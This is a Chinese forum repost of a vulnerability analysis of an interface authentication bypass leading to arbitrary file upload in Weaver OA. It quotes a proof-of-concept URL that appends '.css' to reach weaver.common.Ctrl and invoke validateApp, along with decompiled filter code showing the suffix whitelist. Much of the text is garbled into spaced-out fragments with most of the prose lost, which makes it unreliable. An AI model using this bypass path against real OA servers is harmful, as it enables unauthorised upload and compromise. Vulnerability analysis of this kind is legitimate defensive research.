[28970] 2021-05-27_某OA接口绕过后任意文件上传分析

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-19
2021-05-27_某OA接口绕过后任意文件上传分析 O A O t s   2 0 2 1 - 0 5 - 2 7   -   s p i d e r h t t p s : / / x z . a l i y u n . c o m / u / 2 3 8 2 1 h t t p s : / / x z . a l i y u n . c o m / t / 9 5 8 1 O A P O C g i t h u b P O C . c s s , . c s s , 2 0 0 . c s s 4 0 3 . c s s P O C I P w e a v e r . s e c u r i t y . r u l e s . S e c u r i t y R u l e Q X 2 0 / w e a v e r / w e a v e r . c o m m o n . C t r l / . c s s ? a r g 0 = c o m . c l o u d s t o r e . a p i . s e r v i c e . S e r v i c e _ C h e c k A p p & a r g 1 = v a l i d a t e A p p
U R L w e a v e r c o m m o n   , c t r l 访 P O C / w e a v e r / w e a v e r . c o m m o n . C t r l / . c s s U R L . c s s w e b . x m l f i l t e r w e a v e r . f i l t e r . S e c u r i t y F i l t e r , w e a v e r . f i l t e r . S e c u r i t y F i l t e r i n i t F i l t e r B e a n : w e a v e r . s e c u r i t y . f i l t e r . S e c u r i t y M a i n i n i t F i l t e r B e a n w e a v e r . f i l t e r . S e c u r i t y F i l t e r d o F i l t e r I n t e r n a l
F i l t e r C h a i n w e a v e r . s e c u r i t y . f i l t e r . S e c u r i t y M a i n p r o c e s s i d e a w t f 使 J D s t r 2 U R L U R L c u r i c o c s s p n g j p g g i f f i l t e r w e a v e r . s e c u r i t y . r u l e s . S e c u r i t y R u l e Q X 2 0 p a r a m F i l t e r C h a i n . d o F i l t e r f i l t e r P O C . c s s . c u r 访 w e b . x m l f i l t e r r e s o u r c e w e a v e r . c o m m o n . C t r l a r g 0 a r g 1 d o I n v o k e a r g 0 a r g 1 P O C a r g 0 = c o m . c l o u d s t o r e . a p i . s e r v i c e . S e r v i c e _ C h e c k A p p & a r g 1 = v a l i d a t e A p p , z i p v a l i d a t e A p p O b j e c t   l o c a l O b j e c t 7   =   s t r 2 . t o L o w e r C a s e ( ) . t r i m ( ) ;                     i f   ( ( ( ( S t r i n g ) l o c a l O b j e c t 7 ) . e n d s W i t h ( " . c u r " ) )   | |   ( ( ( S t r i n g ) l o c a l O b j e c t 7 ) . e n d s W i t h ( " . i c o " ) )   | |   ( ( ( S t r i n g ) l o c a l O b j e c t 7 ) . e n d s W i t h ( " . c s s " ) )   | |   ( ( ( S t r i n g ) l o c a l O b j e c t 7 ) . e n d s W i t h ( " . p n g " ) )   | |   ( ( ( S t r i n g ) l o c a l O b j e c t 7 ) . e n d s W i t h ( " . j p g " ) )   | |   ( ( ( S t r i n g ) l o c a l O b j e c t 7 ) . e n d s W i t h ( " . g i f " ) ) )                     {                         i f   ( ! l o c a l S e c u r i t y C o r e . n u l l 2 S t r i n g ( l o c a l S e c u r i t y C o r e . g e t R u l e ( ) . g e t ( " O A - S e r v e r " ) ) . e q u a l s ( " " ) )   {                             l o c a l H t t p S e r v l e t R e s p o n s e . a d d H e a d e r ( " S e r v e r " ,   l o c a l S e c u r i t y C o r e . n u l l 2 S t r i n g ( l o c a l S e c u r i t y C o r e . g e t R u l e ( ) . g e t ( " O A - S e r v e r " ) ) ) ;                         }                         l o c a l S e c u r i t y C o r e . a d d H e a d e r ( l o c a l H t t p S e r v l e t R e q u e s t ,   l o c a l H t t p S e r v l e t R e s p o n s e ) ;                         p a r a m F i l t e r C h a i n . d o F i l t e r ( p a r a m H t t p S e r v l e t R e q u e s t ,   p a r a m H t t p S e r v l e t R e s p o n s e ) ;
c r e a t e L o c a l A p p d e c o m p r e s s 访   -   s p i d e r
h t t p s : / / x z . a l i y u n . c o m / u / 2 3 8 2 1 h t t p s : / / x z . a l i y u n . c o m / t / 9 5 8 1
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则